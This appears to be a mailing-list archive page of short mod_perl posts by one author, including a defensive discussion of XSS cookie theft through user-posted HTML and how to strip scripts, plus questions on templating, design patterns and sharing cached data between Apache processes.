Re: Apache::Session
Hi, All What have you used to stip out that stuff ? I've reviewied HTML::StripScripts, but it seems to be very slow. I've also considered HTML::Filter to do that but I'm also affraid that HTML::Parser is not the fastest thing on the earth, even though it will be invoked once during initial submission. Could you also advise on this safe subset of html you use ? Sincerely, Alex Patrick Galbraith wrote: Strip out stuff that could be problematic. This is what we did with Slash. We strip out javascript or any tag that can be problematic, or be used even to break the layout of the page. It'll make you're life much easier ;) Take this from someone who coded tons of features to ward off trolls!
Apache::Session
Hi, All Sorry, this post might be out of scope of this particular list, but still... don't punch me heavily :) I just think the people here might have met this problem while deploying big public applications. I use Apache::Session to identify logged in users. However, the users are allowed to post html (obviously with javascript) messages viewable by others. That could create an XSS vulnerability and allow to steal the sessions (cookies) from other users. Is it possible to uniquely identify the user by some attributes ? The only thing I consider now is IP, but what about proxies and NATs ? User Agent string could also be stolen via javascript. That means I tend to make stolen session ids non-reusable. Any thoughts ? Sincerely, Aleksandr Guidrevitch
Re: [OT] About XML and Petal (was Re: templating system opinions(axkit?))
Hi, All May be I'm a bit late here... But is there any sence in artifical XML templating languages since there is XSLT ? Just wonder whether there are cons other than long learning curve and performance issues ? Alex Gidrevich
Application design patterns
Hi, All Are there some common application design patterns using mod_perl + TT2 ? Any links would be greatly appreciated Sincerely Alex
Sharing objects
Hi, All again :) That's not the last my post :) What are common patterns of sharing data beetween apache processes, for example I'd like to share some indexes. Also, I'd like to avoid complex sycronyzation process (currently IPC::Sahreable seem to be the right thing) Sincerely Alex
Re: Sharing objects
Hello Perrin No, IPC::Shareable is slow. You are better off with one of these: MLDBM::Sync Cache::Mmap BerkeleyDB (with native locking) Cache::FileCache Actually I think to use Cache::FileCache as the storage backend. But I need to have Cache keys to be sorted by various criteria. I strive to avoid re-reading Cache::* keys and sort them each time, but to share somehow sorted lists beetween apache processes (as they could be huge). However, having an extra key like keys_sorted_by_* in Cache::FileCache will probably solve the problem. Thanks IPC::MM Alex